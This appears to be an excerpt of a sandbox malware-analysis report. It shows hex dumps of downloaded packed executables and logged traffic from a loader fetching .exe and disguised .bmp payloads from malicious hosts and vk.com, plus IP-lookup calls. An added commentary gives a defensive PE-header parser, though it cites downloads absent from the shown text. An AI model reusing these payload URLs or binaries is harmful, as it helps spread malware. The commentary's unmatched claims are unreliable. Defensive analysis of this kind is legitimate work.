48 03 00 00 00 50 cf 00 10 ad 02 00 00 00 00 00 00 00 00 00 00 62 5a 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f cf 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 41 cf 00 68 00 00 00 10 a3 c3 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 30 cf 00 00 10 00 00 00 a2 57 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 40 cf 00 00 10 00 00 00 a4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 10 ad 02 00 00 50 cf 00 00 ae 02 00 00 b4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 f3 0c 12 a0 57 00 20 07 00 00 6f fd ff 
ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 52 82 1f c5 2e c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6c eb d3 92 53 c4 ef c3 41 a5 24 f4 e9 6a f2 d2 75 99 8c 19 fb 7d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.0Date: Wed, 01 May 2024 06:40:23 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=aeb24096.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 20 81 e9 50 4e d2 e9 50 4e d2 e9 50 4e d2 2a 5f 11 d2 eb 50 4e d2 e9 50 4f d2 4a 50 4e d2 2a 5f 13 d2 e6 50 4e d2 bd 73 7e d2 e3 50 4e d2 2e 56 48 d2 e8 50 4e d2 52 69 63 68 e9 50 4e d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 dc a0 64 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 22 02 00 00 08 00 00 fc 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 a0 03 00 90 18 00 00 00 00 00 00 00 00 00 00 8c 5d 0a 00 98 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 58 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 
61 00 00 00 38 fb 01 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 18 00 00 00 a0 03 00 00 1a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:24 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Space1.9_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5995256Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 4a 08 00 00 00 00 00 94 53 d3 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 d5 00 00 02 00 00 f2 3b 5c 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 50 d3 00 4c 00 00 00 4c 50 d3 00 48 03 00 00 00 60 d3 00 04 50 02 00 00 00 00 00 00 00 00 00 00 62 5b 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f d3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 d3 00 68 00 00 00 0c 93 87 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 40 d3 00 00 10 00 00 00 fe 58 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 50 d3 00 00 10 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 04 50 02 00 00 60 d3 00 00 52 02 00 00 10 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 34 0d fd fc 58 00 20 07 00 00 6f fd ff 
ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 53 21 8a b5 ce c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6f 69 5e 1e 6b 44 e5 9d ec 7c a4 57 6a 58 55 b9 96 08 4d 4e e4 01
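The three Apache responses above (Retailer_prog.exe, Default12_big.exe, Space1.9_big.exe) share one header layout: a 64-byte DOS header whose stub text is "Win32 .EXE." and whose e_lfanew is 0x40, a PE32 image with exactly three sections named .MPRESS1, .MPRESS2 and .rsrc, the string "v2.19" after the section table, and an entry point inside the 0xf20-byte .MPRESS2 section rather than the first section. Those are the marks of the MPRESS packer. In each of the three, the security data directory (entry 4, which holds a file offset, not an RVA) points at offset 0x588c00, 0x5a6200 and 0x5b6200 respectively with size 0x18f8, and each Content-Length (5809400, 5929720, 5995256) is exactly 0x18f8 = 6392 bytes beyond the end of that file's last section: the downloads carry a WIN_CERTIFICATE blob as their overlay. The parser below is an added example written for this report, not code from Joe Sandbox or from the sample; it pulls those facts out of the header bytes alone. The byte string is transcribed from the Retailer_prog.exe body above, from the MZ signature through the end of the section table (0x1b0 bytes), and the Content-Length is the one in the same response; the packer section-name table and the flag constants are standard PE knowledge, not something the report states.

```python
import struct
from datetime import datetime, timezone

# First 0x1b0 bytes of the Retailer_prog.exe response body shown above, i.e.
# DOS header, PE signature, COFF and optional headers, the 16 data directories
# and the three section headers. The rest of the download is not reproduced.
RETAILER_PROG_HEADERS = bytes.fromhex("""
4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69
6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00
50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00
00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00
00 a8 08 00 00 00 00 00 94 13 cd 00 00 10 00 00
00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00
06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
00 d0 cf 00 00 02 00 00 73 a7 58 00 02 00 00 80
00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00
00 00 00 00 10 00 00 00 00 10 cd 00 4c 00 00 00
4c 10 cd 00 48 03 00 00 00 20 cd 00 e4 ad 02 00
00 00 00 00 00 00 00 00 00 8c 58 00 f8 18 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 1f cd 00 18 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 78 11 cd 00 68 00 00 00
bc a0 a1 00 40 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31
00 00 cd 00 00 10 00 00 00 cc 55 00 00 02 00 00
00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0
2e 4d 50 52 45 53 53 32 20 0f 00 00 00 10 cd 00
00 10 00 00 00 ce 55 00 00 00 00 00 00 00 00 00
00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00
e4 ad 02 00 00 20 cd 00 00 ae 02 00 00 de 55 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0
""")
RETAILER_PROG_CONTENT_LENGTH = 5809400  # Content-Length header of that response

SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000
DLL_DYNAMIC_BASE, DLL_NX_COMPAT = 0x0040, 0x0100
DIR_SECURITY = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: a file offset, not an RVA
PACKER_SECTIONS = {".MPRESS1": "MPRESS", ".MPRESS2": "MPRESS", "UPX0": "UPX", "UPX1": "UPX"}


def parse_pe_headers(data, content_length=None):
    """Header-only triage of a PE: packer, entry section, W+X sections,
    ASLR/DEP flags and whether a certificate table covers the overlay."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unexpected optional header magic %#x" % magic)
    pe32plus = magic == 0x20B
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    dirs = opt + (112 if pe32plus else 96)  # IMAGE_DATA_DIRECTORY[16]
    sec_off, sec_size = struct.unpack_from("<II", data, dirs + 8 * DIR_SECURITY)

    sections, end_of_sections = [], 0
    for i in range(nsect):  # section table follows the optional header
        name, vsize, va, raw, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw": raw, "rawptr": rawptr, "chars": chars})
        end_of_sections = max(end_of_sections, rawptr + raw)

    def holds(s, rva):
        return s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"])

    packers = {PACKER_SECTIONS[s["name"]] for s in sections if s["name"] in PACKER_SECTIONS}
    return {
        "machine": machine,
        "pe32plus": pe32plus,
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "entry_point": entry,
        "entry_section": next((s["name"] for s in sections if holds(s, entry)), None),
        "sections": sections,
        "packer": next(iter(packers), None),
        "wx_sections": [s["name"] for s in sections
                        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE],
        # VirtualSize far above SizeOfRawData: the stub decompresses the real
        # image into the inflated section at run time.
        "inflated_sections": [s["name"] for s in sections if s["raw"] and s["vsize"] > 2 * s["raw"]],
        "aslr": bool(dll_chars & DLL_DYNAMIC_BASE),
        "nx": bool(dll_chars & DLL_NX_COMPAT),
        "security_dir": (sec_off, sec_size),
        # True when the WIN_CERTIFICATE blob begins exactly where the sections
        # end and runs to the end of the download: the signature is the overlay.
        "overlay_is_certificate": bool(sec_off) and sec_off == end_of_sections
        and (content_length is None or sec_off + sec_size == content_length),
    }
```

The same function handles PE32+ (optional-header magic 0x20b), which is what the 11,214,848-byte application/x-msdownload response above is (machine 0x8664, sections .text, .rdata, .data, .pdata, .00cfg, .tls, .text0, .text1, .text2, .rsrc). A present certificate table says nothing about whether the signature verifies or chains to a trusted root; check the dropped file with signtool verify /pa or osslsigncode verify. The DllCharacteristics value 0x8000 means the packed image opts into neither ASLR nor DEP. The nginx-served aeb24096.exe response is built differently: a conventional "This program cannot be run in DOS mode" stub, a Rich header, and an .ndata section, which NSIS installers use.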
Source: global traffic HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 193.233.132.139 193.233.132.139
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 37.221.125.202 37.221.125.202
Source: Joe Sandbox View ASN Name: PTSERVIDORPT PTSERVIDORPT
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: api.myip.com
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: iplogger.org
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
